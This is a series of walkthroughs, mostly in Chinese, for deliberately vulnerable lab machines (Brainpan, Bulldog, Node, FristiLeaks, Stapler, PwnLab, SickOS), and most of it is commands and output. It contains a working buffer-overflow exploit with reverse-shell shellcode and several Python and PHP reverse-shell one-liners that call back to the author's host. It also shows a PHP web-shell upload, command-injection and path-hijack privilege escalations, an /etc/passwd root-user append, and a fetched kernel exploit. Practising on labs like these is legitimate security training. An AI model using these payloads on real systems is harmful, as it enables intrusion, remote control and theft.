256 IP addresses (3 hosts up) scanned in 3.62 seconds Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 19:48 CST Nmap scan report for 172.20.10.3 Host is up (0.0098s latency). Not shown: 998 closed ports PORT STATE SERVICE 9999/tcp open abyss 10000/tcp open snet-sensor-mgmt Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds ``` ## 9999 & 10000 - 9999 看起來是跑一個程式,看起來就是要 pwn - 10000 看起來是 python `SimpleHTTP/0.6 Python/2.7.3` - dirsearch - http://172.20.10.3:10000/bin/ - [brainpan.exe](http://172.20.10.3:10000/bin/brainpan.exe) ## brainpan.exe - `strings` - 看到可疑字串 `shitstorm` - 輸入正確 但沒東西 - pwn - cylic - 524 可以 overflow - jmp esp 位置 `0x311712f3` - https://blog.csdn.net/lixiangminghate/article/details/53333710 類似的做法 - nop sled - shellcode ``` msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.167 LPORT=80 EXITFUNC=thread -b "\x00\x0A\x0D" -f python ``` - final exp ``` from pwn import * r = remote("172.20.10.3",9999) buf = "" buf += "\xd9\xee\xbd\x28\xf7\x61\xd4\xd9\x74\x24\xf4\x5a\x2b" buf += "\xc9\xb1\x52\x31\x6a\x17\x03\x6a\x17\x83\xea\xf3\x83" buf += "\x21\x16\x13\xc1\xca\xe6\xe4\xa6\x43\x03\xd5\xe6\x30" buf += "\x40\x46\xd7\x33\x04\x6b\x9c\x16\xbc\xf8\xd0\xbe\xb3" buf += "\x49\x5e\x99\xfa\x4a\xf3\xd9\x9d\xc8\x0e\x0e\x7d\xf0" buf += "\xc0\x43\x7c\x35\x3c\xa9\x2c\xee\x4a\x1c\xc0\x9b\x07" buf += "\x9d\x6b\xd7\x86\xa5\x88\xa0\xa9\x84\x1f\xba\xf3\x06" buf += "\x9e\x6f\x88\x0e\xb8\x6c\xb5\xd9\x33\x46\x41\xd8\x95" buf += "\x96\xaa\x77\xd8\x16\x59\x89\x1d\x90\x82\xfc\x57\xe2" buf += "\x3f\x07\xac\x98\x9b\x82\x36\x3a\x6f\x34\x92\xba\xbc" buf += "\xa3\x51\xb0\x09\xa7\x3d\xd5\x8c\x64\x36\xe1\x05\x8b" buf += "\x98\x63\x5d\xa8\x3c\x2f\x05\xd1\x65\x95\xe8\xee\x75" buf += "\x76\x54\x4b\xfe\x9b\x81\xe6\x5d\xf4\x66\xcb\x5d\x04" buf += "\xe1\x5c\x2e\x36\xae\xf6\xb8\x7a\x27\xd1\x3f\x7c\x12" buf += "\xa5\xaf\x83\x9d\xd6\xe6\x47\xc9\x86\x90\x6e\x72\x4d" buf += "\x60\x8e\xa7\xc2\x30\x20\x18\xa3\xe0\x80\xc8\x4b\xea" buf += "\x0e\x36\x6b\x15\xc5\x5f\x06\xec\x8e\xf3\xc3\xe4\x46" buf += "\x64\xee\xf8\x52\xa6\x67\x1e\x30\x56\x2e\x89\xad\xcf" buf += "\x6b\x41\x4f\x0f\xa6\x2c\x4f\x9b\x45\xd1\x1e\x6c\x23" buf += "\xc1\xf7\x9c\x7e\xbb\x5e\xa2\x54\xd3\x3d\x31\x33\x23" buf += "\x4b\x2a\xec\x74\x1c\x9c\xe5\x10\xb0\x87\x5f\x06\x49" buf += "\x51\xa7\x82\x96\xa2\x26\x0b\x5a\x9e\x0c\x1b\xa2\x1f" buf += "\x09\x4f\x7a\x76\xc7\x39\x3c\x20\xa9\x93\x96\x9f\x63" buf += "\x73\x6e\xec\xb3\x05\x6f\x39\x42\xe9\xde\x94\x13\x16" buf += "\xee\x70\x94\x6f\x12\xe1\x5b\xba\x96\x01\xbe\x6e\xe3" buf += "\xa9\x67\xfb\x4e\xb4\x97\xd6\x8d\xc1\x1b\xd2\x6d\x36" buf += "\x03\x97\x68\x72\x83\x44\x01\xeb\x66\x6a\xb6\x0c\xa3" payload = "a"*524 + b'\xf3\x12\x17\x31' + '\x90'*10 + buf r.sendline(payload) r.interactive() ``` ## escape ``` CMD Version 1.4.1 Z:\home\puck>/bin/sh -i $ id uid=1002(puck) gid=1002(puck) groups=1002(puck) $ python -c 'import pty;pty.spawn("/bin/bash")' puck@brainpan:~$ id File not found. Z:\home\puck> 幹怎麼回去ㄌ 只好打一個 reverse shell python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.8",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' nc -lk 1111 python -c 'import pty;pty.spawn("/bin/bash")' ``` ## 提權 ``` puck@brainpan:~$ ls ls checksrv.sh web puck@brainpan:~$ sudo -l sudo -l Matching Defaults entries for puck on this host: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User puck may run the following commands on this host: (root) NOPASSWD: /home/anansi/bin/anansi_util puck@brainpan:~$ sudo /home/anansi/bin/anansi_util manual ls sudo /home/anansi/bin/anansi_util manual ls No manual entry for manual WARNING: terminal is not fully functional - (press RETURN) LS(1) User Commands LS(1) NAME ls - list directory contents SYNOPSIS ls [OPTION]... [FILE]... DESCRIPTION List information about the FILEs (the current directory by default). Sort entries alphabetically if none of -cftuvSUX nor --sort is speci‐ fied. Mandatory arguments to long options are mandatory for short options too. -a, --all do not ignore entries starting with . -A, --almost-all do not list implied . and .. --author Manual page ls(1) line 1 (press h for help or q to quit)!/bin/sh !/bin/sh # id uid=0(root) gid=0(root) groups=0(root) # whoami root ``` # bulldog 1 ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 09:22 CST Nmap scan report for 172.20.10.2 Host is up (0.0042s latency). Not shown: 997 closed ports PORT STATE SERVICE 23/tcp open telnet 80/tcp open http 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds ``` 有 `telnet`,試著連線看看 ``` Trying 172.20.10.2... Connected to 172.20.10.2. Escape character is '^]'. SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2 ... ``` 好吧,他只是把 `ssh` 開在 23 port,繼續搜尋其他線索 ## 80,8080 port web application - 先進行 `dirsearch` 掃看看 ``` [09:24:11] Starting: [09:24:20] 301 - 0B - /admin -> http://172.20.10.2:8080/admin/ [09:24:24] 302 - 0B - /admin/?/login -> http://172.20.10.2:8080/admin/login/?next=/admin/%3F/login [09:24:24] 302 - 0B - /admin/ -> http://172.20.10.2:8080/admin/login/?next=/admin/ [09:24:27] 301 - 0B - /admin/login -> http://172.20.10.2:8080/admin/login/ [09:25:16] 301 - 0B - /dev -> http://172.20.10.2:8080/dev/ [09:25:16] 200 - 3KB - /dev/ [09:25:43] 200 - 1KB - /robots.txt Task Completed ``` - admin - 發現是 `django`,找看看 cve - https://nvd.nist.gov/vuln/detail/CVE-2019-3498 - u洞但沒用! - 沒找到什麼有機會利用的漏洞 - login - 預設密碼試試 - 沒用 - sql injection - 沒用 - dev - 有一個 `webshell` - 開心點進去發現 `Please authenticate with the server to use Web-Shell`,至少需要有一組帳號的權限 - 網頁最下方有會員 list,先觀察 html,發現有藏 hash - 拿去 cmd5 identify,發現是 sha1 - 隨意找一個 decrypt 網站,有兩組可以 decrypt - nick & sarah - 到 admin page 登入,成功使用 webshell ``` ddf45997a7e18a25ad5f5cf222da64814dd060d5 d8b8dd5e7f000b8dea26ef8428caf38c04466b3e 2/2 found (100%) ddf45997a7e18a25ad5f5cf222da64814dd060d5 : bulldog d8b8dd5e7f000b8dea26ef8428caf38c04466b3e : bulldoglover Found in 0.24s ``` ## webshell - 限制了以下的指令 - ifconfig、ls、echo、pwd、cat、rm - 想辦法繞過 ```=command Command : ls | id uid=1001(django) gid=1001(django) groups=1001(django),27(sudo) INVALID COMMAND. I CAUGHT YOU HACKER! ';' CAN BE USED TO EXECUTE MULTIPLE COMMANDS!! ``` - 好吧,不能用 `;`,那我們試試有沒有 `wget`,測試過後發現可以 - 直接丟一個 python reverse shell 上去 - Get remote shell ```=python import socket import subprocess import os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.0.60",1111)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]); ``` - 一樣,拿到 reverse shell 後先拿 pty - `python -c 'import pty;pty.spawn("/bin/bash")'` ## remote shell - passwd - 有另外一個用戶 `bulldogadmin`,有可能是要找這個用戶的密碼 - db.sqlite3 - strings 看字串 - 有 hash 爆不開 - 進去 `cd bulldogadmin` 看看 - `ls -al` - 可疑資料夾 `.hiddenadmindirectory` - 有一個 `note` 檔案有權限可以看 ``` Nick, I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not! It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes? Let me know what you think of it! -Ashley ``` - Binary 檔案 `customPermissionApp` - 無法執行,strings 看看 ``` libc.so.6 puts __stack_chk_fail system __libc_start_main __gmon_start__ GLIBC_2.4 GLIBC_2.2.5 UH-H SUPERultH imatePASH SWORDyouH CANTget dH34%( AWAVA AUATL []A\A]A^A_ Please enter a valid username to use root privileges Usage: ./customPermissionApp <username> sudo su root ;*3$" GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609 crtstuff.c __JCR_LIST__ deregister_tm_clones __do_global_dtors_aux completed.7585 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry customPermissionApp.c __FRAME_END__ ... ``` - 看到疑似密碼的字串 - `SUPERultimatePASSWORDyouCANTget` - 拿去 `ssh` 先前的用戶 `bulldogadmin` - 錯誤 - 再觀察一下,他是用這串密碼去 `sudo su root` - 拿去 `sudo su root` - win ``` django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ sudo su root sudo su root [sudo] password for django: SUPERultimatePASSWORDyouCANTget root@bulldog:/home/bulldogadmin/.hiddenadmindirectory# root@bulldog:/home/bulldogadmin/.hiddenadmindirectory# id id uid=0(root) gid=0(root) groups=0(root) ``` # Bulldog2 - nmap - `80/tcp open http` ## JWT - 看到 user - 登入 - sqlmap 無解 - 拿去爆破 - ![](https://i.imgur.com/7Y70X4x.png) - user 登入後看到一組 jwt,拿去下面這個網站解一下 - jwt.io ``` eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXlsb2FkIjp7Im5hbWUiOiJBZG9scGhvIEtpcmJ5IiwiZW1haWwiOiJhZG9scGhva2lyYnlAaGFwcHltYWlsLmNvbSIsInVzZXJuYW1lIjoiaXBhZG9scGhvIiwiYXV0aF9sZXZlbCI6InN0YW5kYXJkX3VzZXIiLCJyYW5kIjoxNn0sImlhdCI6MTU1MjI0MTk2NCwiZXhwIjoxNTUyODQ2NzY0fQ.doQtz4CPm9TPNU2ivy-zW42iG-RBY9BAEjmsdxXJ-go ``` ![](https://i.imgur.com/uzXDBwl.png) - https://www.freeformatter.com/javascript-escape.html#ad-output - decode javascript - 找關鍵字 token 發現關鍵幾行 - ![](https://i.imgur.com/NZ5kU2q.png) - 修改 - ![](https://i.imgur.com/FGXerLW.png) - 出現 Admin Panel ## Admin Panel to cmdi - 卡超久,最後掃下去發現新天地 - ![](https://i.imgur.com/7txbeeB.png) - reverse shell ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.8",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python -c 'import pty;pty.spawn("/bin/bash")' ``` ## SHELL AND ROOT ![](https://i.imgur.com/d1pQmFc.png) 看好久... 最後發現 /etc/passwd 可以直接改 ``` openssl passwd -1 -salt meow meow $1$meow$U4BAcyBwZZmNa4Ku/4zcF1 echo 'meow:$1$meow$U4BAcyBwZZmNa4Ku/4zcF1:0:0:root:/root:/bin/sh' >> /etc/passwd sudo meow # id id uid=0(root) gid=0(root) groups=0(root) ``` ![](https://i.imgur.com/hkMibPK.png) # node ## nmap - 3000 - web application - 22 - ssh ## 3000 port forensic ```=javascript admin.js var controllers = angular.module('controllers'); controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) { $scope.backup = function () { $window.open('/api/admin/backup', '_self'); } $http.get('/api/session') .then(function (res) { if (res.data.authenticated) { $scope.user = res.data.user; } else { $location.path('/login'); } }); }); home.js var controllers = angular.module('controllers'); controllers.controller('HomeCtrl', function ($scope, $http) { $http.get('/api/users/latest').then(function (res) { $scope.users = res.data; }); }); login.js var controllers = angular.module('controllers'); controllers.controller('LoginCtrl', function ($scope, $http, $location) { $scope.authenticate = function () { $scope.hasError = false; $http.post('/api/session/authenticate', { username: $scope.username, password: $scope.password }).then(function (res) { if (res.data.success) { $location.path('/admin'); } else { $scope.hasError = true; $scope.alertMessage = 'Incorrect credentials were specified'; } }, function (resp) { $scope.hasError = true; $scope.alertMessage = 'An unexpected error occurred'; }); }; }); profile.js var controllers = angular.module('controllers'); controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) { $http.get('/api/users/' + $routeParams.username) .then(function (res) { $scope.user = res.data; }, function (res) { $scope.hasError = true; if (res.status == 404) { $scope.errorMessage = 'This user does not exist'; } else { $scope.errorMessage = 'An unexpected error occurred'; } }); }); ``` - 存取 `http://172.20.10.3:3000/api/users/` 發現 admin 帳號 - myP14ceAdm1nAcc0uNT - dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af - https://www.onlinehashcrack.com/hash-identification.php#results - sha256 - https://www.dcode.fr/sha256-hash - 解出來:manchester ## download backup - myplace.backup - 看子來是 base64 - cat myplace.backup | base64 -D > file.bin - file file.bin - file.bin: Zip archive data, at least v1.0 to extract - 看起來是 zip,我們解壓縮看看 - zipinfo 看起來是網站的 backup - 有密碼 - 試試看 pkcrack ```=shell pkcrack -p jquery.js -c var/www/myplace/static/vendor/jquery/jquery.js -C file.zip Or as a string: 'magicword' (without the enclosing single quotes) Finished on Sat Mar 7 23:42:11 2019 ``` ```=javascript cat app.js|head -n 12  ✔  14:46:35 const express = require('express'); const session = require('express-session'); const bodyParser = require('body-parser'); const crypto = require('crypto'); const MongoClient = require('mongodb').MongoClient; const ObjectID = require('mongodb').ObjectID; const path = require("path"); const spawn = require('child_process').spawn; const app = express(); const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace'; const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474'; ``` ## 提權 - https://www.exploit-db.com/download/44298 - Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation ```=shell mark@node:/$ uname -a Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux mark@node:/$ cd /tmp mark@node:/tmp$ wget https://www.exploit-db.com/download/44298 mark@node:/tmp$ mv 44298 44298.c mark@node:/tmp$ gcc -o exp 44298.c mark@node:/tmp$ ./exp task_struct = ffff88002c2eaa00 uidptr = ffff88002ef66784 spawning root shell root@node:/tmp# id uid=0(root) gid=0(root) groups=0(root),1001(mark) ``` # fristi ## fuzzing - 80 port - dirsearch - robots.txt - image ## web ``` User-agent: * Disallow: /cola Disallow: /sisi Disallow: /beer ``` - 這三個目錄都不是 - admin - root - user - backups - ... - 最後輸入 - fristi - 看到 admin panel - base64 藏在 html - 一張圖片 - ![](https://i.imgur.com/ZAhHrB5.png) - user/keKkeKKeKKeKkEkkEk - admin/keKkeKKeKKeKkEkkEk - root/keKkeKKeKKeKkEkkEk - 都不行... - 再次看看 html 發現 username - eezeepz/keKkeKKeKKeKkEkkEk - 成功登入! ## upload test ``` Sorry, is not a valid file. Only allowed are: png,jpg,gif Sorry, file not uploaded ``` - `foo.php.gif` 上傳看看 - 成功 - 想辦法做一個 reverse shell 囉 ## shell - `ps aux` - 沒怪東西 - cat checklogin.php - 有 db 帳密,進去看,沒什麼東西 - `uname -a` - `Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux` - 有試著找看看提權 exploit 但是都失敗 - 資料夾有有趣的 ```=bash bash-4.1$ cat notes.txt cat notes.txt Yo EZ, I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/ Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges. echo "/home/admin/chmod -R 777 /home/admin " > runthis drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 . drwxr-xr-x. 5 root root 4096 Nov 19 2015 .. -rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout -rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile -rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc -rwxrwxrwx 1 admin admin 45224 Nov 18 2015 cat -rwxrwxrwx 1 admin admin 48712 Nov 18 2015 chmod -rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py -rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt -rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py -rwxrwxrwx 1 admin admin 90544 Nov 18 2015 df -rwxrwxrwx 1 admin admin 24136 Nov 18 2015 echo -rwxrwxrwx 1 admin admin 163600 Nov 18 2015 egrep -rwxrwxrwx 1 admin admin 163600 Nov 18 2015 grep -rwxrwxrwx 1 admin admin 85304 Nov 18 2015 ps -rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt ``` - 觀察 cryptedpass - 發現是 base64 -> rev -> rot13 - 反過來做 ```=bash [admin@localhost ~]$ echo =ESa0NXayZUZCVmclhGV0VGT|rev|base64 -d echo =ESa0NXayZUZCVmclhGV0VGT|rev|base64 -d LetThereBeFristi![admin@localhost ~]$ ls -al [admin@localhost ~]$ su fristigod su fristigod Password: LetThereBeFristi! bash-4.1$ sudo -l sudo -l [sudo] password for fristigod: LetThereBeFristi! Matching Defaults entries for fristigod on this host: requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User fristigod may run the following commands on this host: (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom bash-4.1$ bash-4.1$ /var/fristigod/.secret_admin_stuff/doCom d /var/fristigod/.secret_admin_stuff/doCom d Nice try, but wrong user ;) sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash bash-4.1# id id uid=0(root) gid=100(users) groups=100(users),502(fristigod) ls /root fristileaks_secrets.txt bash-4.1# cat /root/f* cat /root/f* Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu] I wonder if you beat it in the maximum 4 hours it's supposed to take! Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode) Flag: Y0u_kn0w_y0u_l0ve_fr1st1 bash-4.1# ``` - 其實最後拿 root 還蠻快的 - 解開密碼算簡單,他直接給你一個 `cryptpass.py` 大提示...,其他就是 crypto 基本功,如果 rot13 跟 base64 一眼看不出來真的可以回去看一下基本密碼學 - trick 點在 `sudo -l` 他有指定 user 去執行,不能直接用現在這個用戶去執行(雖然可以 sudo 執行了) - 其他沒什麼太 trick 的 - 他說大概用四小時,不過大概花一小時左右就解了,每個地方都沒有卡很久,不太通靈的一個靶機,都有適當的線索可以讓你很快的找到下一步 # Stapler ## nmap ```=1 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-18 02:42 CST Nmap scan report for 172.20.10.3 Host is up (0.028s latency). Not shown: 992 filtered ports PORT STATE SERVICE 20/tcp closed ftp-data 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 666/tcp open doom 3306/tcp open mysql Nmap done: 1 IP address (1 host up) scanned in 7.69 seconds ``` - 80 - dirsearch - .profile - .bashrc - .bash_logout - ftp 匿名登入看到一個檔案 - note - `Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.` - 666 port - 一個 zip - 解開是一個檔案 - ![](https://i.imgur.com/uLkzMVF.jpg) - 139 port - 可以匿名登入 - 看到兩個資料夾 - tmp - 另外一個資料夾可以下載 wordpress - wordpress 看看有沒有 db 帳密,因為有開 3306 - 找了一下沒有,裡面沒有 config - 使用 msf 掃描版本 - Samba 4.3.9-Ubuntu - 上網找 exploit 看看 - http://vinc.top/2017/05/27/samba%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/ - 找到這篇可以用 - CVE-2017-7494 - https://github.com/opsxcq/exploit-CVE-2017-7494 - SambaCry ## SMB exploit ```=bash msf auxiliary(scanner/smb/smb_version) > set RHOSTS 172.20.10.3 RHOSTS => 172.20.10.3 msf auxiliary(scanner/smb/smb_version) > exploit [*] 172.20.10.3:139 - Host could not be identified: Windows 6.1 (Samba 4.3.9-Ubuntu) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(scanner/smb/smb_version) > msf auxiliary(scanner/smb/pipe_auditor) > use exploit/linux/samba/is_known_pipename msf exploit(linux/samba/is_known_pipename) > show options Module options (exploit/linux/samba/is_known_pipename): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The SMB service port (TCP) SMB_FOLDER no The directory to use within the writeable SMB share SMB_SHARE_NAME no The name of the SMB share containing a writeable directory Exploit target: Id Name -- ---- 0 Automatic (Interact) msf exploit(linux/samba/is_known_pipename) > set RHOST 172.20.10.3 RHOST => 172.20.10.3 msf exploit(linux/samba/is_known_pipename) > exploit [-] 172.20.10.3:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (172.20.10.3:445). [*] Exploit completed, but no session was created. msf exploit(linux/samba/is_known_pipename) > set RPORT 139 RPORT => 139 msf exploit(linux/samba/is_known_pipename) > exploit [*] 172.20.10.3:139 - Using location \\172.20.10.3\tmp\ for the path [*] 172.20.10.3:139 - Retrieving the remote path of the share 'tmp' [*] 172.20.10.3:139 - Share 'tmp' has server-side path '/var/tmp [*] 172.20.10.3:139 - Uploaded payload to \\172.20.10.3\tmp\InMPOtCG.so [*] 172.20.10.3:139 - Loading the payload from server-side path /var/tmp/InMPOtCG.so using \\PIPE\/var/tmp/InMPOtCG.so... [-] 172.20.10.3:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND [*] 172.20.10.3:139 - Loading the payload from server-side path /var/tmp/InMPOtCG.so using /var/tmp/InMPOtCG.so... [-] 172.20.10.3:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND [*] 172.20.10.3:139 - Uploaded payload to \\172.20.10.3\tmp\bceKRtMm.so [*] 172.20.10.3:139 - Loading the payload from server-side path /var/tmp/bceKRtMm.so using \\PIPE\/var/tmp/bceKRtMm.so... [-] 172.20.10.3:139 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND [*] 172.20.10.3:139 - Loading the payload from server-side path /var/tmp/bceKRtMm.so using /var/tmp/bceKRtMm.so... [+] 172.20.10.3:139 - Probe response indicates the interactive payload was loaded... [*] Found shell. [*] Command shell session 1 opened (172.20.10.8:57342 -> 172.20.10.3:139) at 2019-03-18 03:45:06 +0800 id uid=0(root) gid=0(root) groups=0(root) python -c 'import pty;pty.spawn("/bin/bash")' root@red:/tmp# ls ls root@red:/tmp# id id uid=0(root) gid=0(root) groups=0(root) root@red:/tmp# cd /root cd /root root@red:/root# ls ls fix-wordpress.sh flag.txt issue python.sh wordpress.sql root@red:/root# cat fl* cat fl* ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ .-'''''-. |'-----'| |-.....-| | | | | _,._ | | __.o` o`"-. | | .-O o `"-.o O )_,._ | | ( o O o )--.-"`O o"-.`'-----'` '--------' ( o O o) `----------` b6b545dc11b7a270f4bad23432190c75162c4a2b root@red:/root# ``` ## 後記 - 網頁跑去看根本沒東西,他 bind 的 /home/www 裡面根本就是 dirsearch 掃出來剛好那三個檔案 - 可能還要去研究看看其他解法ㄅ # pwnlab ## nmap ``` 80/tcp open http 111/tcp open rpcbind 3306/tcp open mysql ``` ## php - LFI - 看了一下 cookie 可以讀檔 - lang=../../../../etc/passwd - ![](https://i.imgur.com/mIPt4Wr.png) - config.php 裡面有帳號密碼 - root/H4u%QJ_H99 - database ``` show databases; use Users; select * from users; ``` ![](https://i.imgur.com/xsPUkJg.png) ## upload and get shell - upload - bypass via gif header ```=html -----------------------------381804318928229381999855955 Content-Disposition: form-data; name="file"; filename="poc.php.gif" Content-Type: image/jpeg GIF <?php die(`$_GET[s];`)?> -----------------------------381804318928229381999855955 Content-Disposition: form-data; name="submit" Upload -----------------------------381804318928229381999855955-- Response <img src="upload/79465d1be78b859624c6b7877f374e6c.gif"><br /></center> ``` - LFI - `lang=../upload/79465d1be78b859624c6b7877f374e6c.gif` - getshell ```=1 GET /?s=ls HTTP/1.1 Host: 172.20.10.4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=h8513mm6nhlvpmbmiao3e05rr2; lang=../upload/79465d1be78b859624c6b7877f374e6c.gif Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 HTTP/1.1 200 OK Date: Mon, 18 Mar 2019 14:39:19 GMT Server: Apache/2.4.10 (Debian) Content-Length: 61 Connection: close Content-Type: text/html; charset=UTF-8 GIF config.php images index.php login.php upload upload.php ``` ## reverse shell ```=1 GET /?s=php+-r+'%24sock%3Dfsockopen("172.20.10.8"%2C1234)%3Bexec("%2Fbin%2Fsh+-i+<%263+>%263+2>%263")%3B' HTTP/1.1 Host: 172.20.10.4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=h8513mm6nhlvpmbmiao3e05rr2; lang=../upload/79465d1be78b859624c6b7877f374e6c.gif Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` ```=python python -c 'import pty;pty.spawn("/bin/bash")' ``` ## root - 這邊有點不熟,後來才想到可以改 $PATH - kane 下面有 msgmike 的可執行檔,會去 cat /home/mike/msg.txt - 理論上,可以透過修改 $PATH 的方式讓他去執行其他的 binary ```=linux export PATH=.:$PATH cat /bin/sh > ./cat chmod 777 cat ./msgmike ``` - 後來發現這樣不行,他會直接 `bash /home/mike/msg.txt` 沒啥用啊 ```=linux cat zzzzz> ./cat ./msgmike ./cat: 1: ./cat: zzzzz: not found cat "/bin/sh" > cat cat: 0: Can't open /home/mike/msg.txt echo "/bin/bash" > cat ./msgmike mike@pwnlab:~$ id id uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane) mike@pwnlab:~$ ``` - 成功了,不知道為啥 `/bin/sh` 不可以 - 後來才發現 `echo` 打成 `cat`... - msg2root - strings 看一下 ```=1 ..... Message for root: /bin/echo %s >> /root/messages.txt ;*2$"( GCC: (Debian 4.9.2-10) 4.9.2 GCC: (Debian 4.8.4-1) 4.8.4 .symtab ..... ``` - 基本上就是把一段字串 echo 到檔案裡面 - 直接用 PIPE 截斷後執行即可 - 結果不是用 PIPE,是用分號 XD ```=linux mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: |/bin/sh |/bin/sh mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: ./msg2root ./msg2root ./msg2root mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: |/bin/sh && |/bin/sh && mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: |/bin/sh -i |/bin/sh -i # # mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: |/bin/sh -i; |/bin/sh -i; # # mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: ;/bin/sh; ;/bin/sh; # id id uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane) # whoami whoami root # ``` # sickos ## nmap ``` PORT STATE SERVICE 22/tcp open ssh 80/tcp open http ``` ## dirsearch - [13:19:02] 200 - 1KB - /test/ - nothing here - options 看看 - 可以 `put` ## 上傳 php and reverse shell - 上傳一個 reverse shell ## shell - uname -a - `Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux` - 找到兩個提權腳本都沒辦法用 - 看 home 有沒有怪檔案 - 有 john 但沒權限看 